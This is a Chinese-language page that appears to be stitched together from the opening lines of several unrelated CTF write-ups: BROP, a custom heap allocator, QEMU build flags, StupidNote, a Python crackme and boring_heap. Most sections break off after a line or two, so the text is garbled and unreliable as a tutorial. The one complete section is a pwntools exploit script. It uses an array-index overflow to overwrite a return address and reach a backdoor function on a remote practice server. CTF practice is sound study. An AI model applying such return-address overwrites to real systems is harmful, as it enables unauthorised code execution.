由于初学也是因为太笨的原因一直没有彻底学习一下brop，今天因为某些原因必须做一道 brop 把自己逼出来了

写在前面

BROP攻击基于一篇发表在Oakland 2014的论文Hacking Blind，作者是Standford的Andrea Bittau，以下是相关的paper和slide链接：

paper

slide

以及BROP的原网站地址

mheap

先贴上我觉得最可惜的一道题

程序自已定义了分配原则

1
2
3
4
5

struct chunk{
    size_t size;
    void* next; //only use after free
    char buf[size];
}

并且在程序一开始在0x23330000处申请了0x1000大小的空间当top chunk，以后的每次申请都从这个区域切割

编译

本文使用的是qemu-2.10.1，linux-4.10.10

编译qemu时关闭优化并开启调试信息，方便调试

1
2

cd qemu-2.10.1/
CFLAGS="-no-pie -fno-stack-protector -z execstack" ./configure --enable-debug --disable-strip

catflag

nc 连接直接get shell

homeosrk

数组下标溢出，绕过canary保护直接修改ret地址为后门函数call_me_mabe

这里可以算出arr[14]为ret位置

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

from pwn import *
# p = process('./homework')
p = remote('hackme.inndy.tw',7701)
call_me = 0x80485FB
print str(call_me)
pause()
p.recvuntil('What\'s your name? ')
p.sendline('n0va')
p.recvuntil('4 > dump all numbers\n')
p.recvuntil(' > ')
p.sendline('1')
p.recvuntil('Index to edit: ')
p.sendline('14')
p.recvuntil('How many? ')
p.sendline(str(call_me))
p.sendline('0')
p.interactive()

程序保护全开，程序功能：

1
2
3
4

1.add
2.delete
3.edit
4.exit

pwn

three

静态编译文件，开了NX，

StupidNote

glibc2.31下的off-by-null，禁用了execve，并且加了点料

这里的off-by-null藏得很深，我也是在放出hint后才找到的

python_crackme

（拿安恒杯1月月赛的题目she来讲）首先，你会拿到一个由python编译的exe文件，使用pyinstxtractor.py脚本（下载地址）反编译exe文件

得到一个文件夹里面有一大堆东西

用010editor打开与exe文件同名的二进制文件

添加上python3.6的.pyc文件的文件头（即前12字节）然后再加上后缀名.pyc

pwn

your_pwn

先check 一下，发现保护全开，还是有点慌的

进入到IDA审计代码

boring_heap

挺不错的一题

先看一眼保护–全开

程序功能：

1
2
3
4
5

1.Add
2.Update
3.Delete
4.View
5.Exit